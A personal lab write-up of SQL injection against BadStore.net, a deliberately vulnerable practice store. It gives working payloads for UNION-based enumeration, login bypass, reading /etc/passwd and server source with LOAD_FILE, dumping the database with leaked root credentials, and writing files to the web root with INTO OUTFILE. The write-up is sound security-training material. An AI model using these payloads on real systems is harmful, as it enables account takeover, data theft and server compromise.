BadStore SQLi Writeup
A little while ago I went through a security course, and we were testing SQLi on BadStore.net. BadStore.net is a website created to test common web attacks on. I enjoyed practicing on it, and wanted to do a write of some of the things you can do a SQLi vulnerablility.
I used single quote to test different fields for SQL injection vulnerability. This caused an error telling me the query had invalid syntax, and that the database was MySQL.
Since this is a practice website it gives you the query, “SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE ‘
Other injections that could be used to do the same are:
“’ OR 1=1 #”, closes string then makes true statement
“’ OR 1 #”, closes string, the 1 is treated as true by MySQL
A good next step is to find the version of the database being ran. To do this we need to inject a UNION statement. A UNION statement will only work if both tables have the same number of columns. To find the right number of columns we can add 1 for each extra column until there is no error. This table has 6 columns, 4 from table, image, and a check box for checkout.
1’=’1’ UNION SELECT VERSION() # unions with 1 column table
1’=’1’ UNION SELECT VERSION(), 1 # unions with 2 column table
1’=’1’ UNION SELECT VERSION(), 1, 1 # unions with 3 column table
1’=’1’ UNION SELECT VERSION(), 1, 1, 1 # unions with 4 columns table
This tells us that the MySQL version is 4.1.7-standard. INFORMATION_SCHEMA is a good way to find all the databases, tables and columns that are in the database. Unfortunately, this was added in version 5.02 which is after BadStore’s database. Instead this information needs to be guessed through trail and error.
To start guessing table names we can use “1’=’1’ UNION SELECT 1, 1, 1 from <table_name> #”. To make it easier on ourseleves the WHERE can be made false, so only the injected information shows up. Now if nothing shows up then there is no table name for the name you guessed. The first query told us the item table is called itemdb, so we can guess there might be a userdb for users.
1’=’0’ UNION SELECT 1, 1, 1, 1 from userdb #
Now we know that there is a table called userdb. While testing on BadStore, if it tells you that the search bar is too short then you can use other methods. Examples are using Burpsuite to change the request outside of the form, or use curl. The maxlength can also be changed by inspecting the html form input field, and editing it in the browser.
The BadStore also passes the form input through the URL, so it can be changed there too. If puting the SQL injection into the URL, the string needs to be URL encoded.
http://192.168.126.135/cgi-bin/badstore.cgi?searchquery=1%27%3D%270%27+UNION+SELECT+1%2C+1%2C+1%2C+1+from+userdb+%23+&action=search&x=0&y=0
Is the same as
1’=’0’ UNION SELECT 1, 1, 1, 1 from userdb #
Some of the special charaters encoded are:
‘ = %27
= = %3D
, = %2C
# = %23
/ = %2F
+ = space
There is a table called userdb, but we need to find the column names so we can start dumping information. One way to find possible names for the columns is through the tags in the html. If we open the source for the login page and search for “INPUT TYPE”, there are tags for “email”, “fullname”, “passwd”, and “pwdhint”. These can be used to start testing for column names.
Each of the following returns information about a user.
1’=’0’ UNION SELECT email, 1, 1, 1 from userdb #
1’=’0’ UNION SELECT fullname, 1, 1, 1 from userdb #
1’=’0’ UNION SELECT passwd, 1, 1, 1 from userdb #
1’=’0’ UNION SELECT pwdhint, 1, 1, 1 from userdb #
The site will log in a user by querying the database for a username and password. If this query returns successfully then the username in the first row is used to log in the user. It doesn’t matter how many rows are returned, aslong as there is one. This is why we making this query return true, will let us login to the site.
Now we have a list of user names, emails and password hashes for BadStore. In the login page we can inject “admin’ #”, this sets the username as admin and comments out the password check.
If we didn’t have a list of the users then we could try injecting “’ OR 1=1 #”, which will log you in as the first user in the userdb table. For BadStore this logs you in as the test account.
Another injection to try is “’ OR 1=1 ORDER BY email #”, which will log you in as the first email when ordered alhaphecially. If you don’t know the exact version of admin they are using the injection “’ OR email like ‘admin’ #” can be used. This will return any records where the email contains admin, such as “admin”, “administor”, “dbadmin”, or “admindb”.
If the database doesn’t have an account called admin then all the accounts can be interated over until an account is found with the permissions needed. The command LIMIT can be used to return the nth row in a table. The query “’ OR 1=1 LIMIT 3, 1 #”, will return the 4th row in the table. The row number can be changed each time to change the user login as until you hit an error, which means there are no more users.
The same techniques can be used to login as a supplier.
Another useful feature that MySQL provides is called load_file, which will load a file from the server into the table. This can be used to load any file that the database has access to. If we wanted to read the /etc/passwd file we could inject “1’=’0’ UNION SELECT 1, 1, 1, LOAD_FILE(‘/etc/passwd’) #”.
This will give us all the user accounts for the underlying system, which are root and nobody here. When we got an error eariler there was a path to the .cgi file, “/usr/local/apache/cgi-bin/badstore.cgi”. If we didn’t have this error then we could check common places files are stored on webservers, or use the URL as a guide. Lets see what is in it.
1’=’0’ UNION SELECT 1, 1, 1, LOAD_FILE(‘/usr/local/apache/cgi-bin/badstore.cgi’) #
This is the file the webserver uses to create the BadStore webpage. There are some interesting things we can find in this page.
The username and password to the MySQL database is root and secret.
There is a secret admin portal referenced in the code.
The layout of the cookie can be found here, along with the fact it checks the cookie to see if user is an admin. This information could be used to manipulate the cookie to get access to things you are supposed to be able to .
Errors logs:
h2(“Recent Apache Error Log”),p,hr, `tail /usr/local/apache/logs/error_log`
Location of backup database:
prepare( “SELECT * FROM orderdb INTO OUTFILE ‘/usr/local/apache/htdocs/backup/orderdb.bak’”)
Other table names:
INSERT INTO orderdb (sessid, orderdate, ordertime, ordercost, orderitems, itemlist, accountid, ipaddr, cartpaid, ccard, expdate)
Cart cookie:
There’s probably even more information you can get from the .cgi file. We know the MySQL database username and password now so we can connect directly to it instead of going through the website.
The database can also be dumped using “mysqldump -h 192.168.126.135 -u root -p badstoredb > local_file”
If using a MySQL client version that is after 5.02 you may get the error “mysqldump: Error: ‘Table ‘INFORMATION_SCHEMA.FILES’ doesn’t exist’ when trying to dump tablespaces”. This is fine, its just looking for INFORMATION_SCHEMA, but it still dumps the database. The database dump will give us all the tables and columns in the database, along with any information stored in them.
BadStore allows the user to upload files to the server from the supplier page. If this wasn’t available, then the MySQL function outfile could be used. This function can be used to write a field from a column into a file on the webserver.
From the MySQL console we can issue the following commands:
CREATE TABLE badstoredb.`exploit` ( `code` varchar(256));
INSERT INTO badstoredb.exploit VALUES (‘test exploit’);
SELECT code into outfile ‘/usr/local/apache/cgi-bin/test.html’ from badstoredb.exploit;
When there is a SQLi vulnerablility in a website, there is usually alot more the attacker can do than just login. Below are some of the things we did:
- Log in as every user without knowing their name
- Uploaded files
- Read files on server
- Dump database
- View senstive information
Things we could still do:
- Execute system commands
- DROP database, for DoS
- Insert/Update records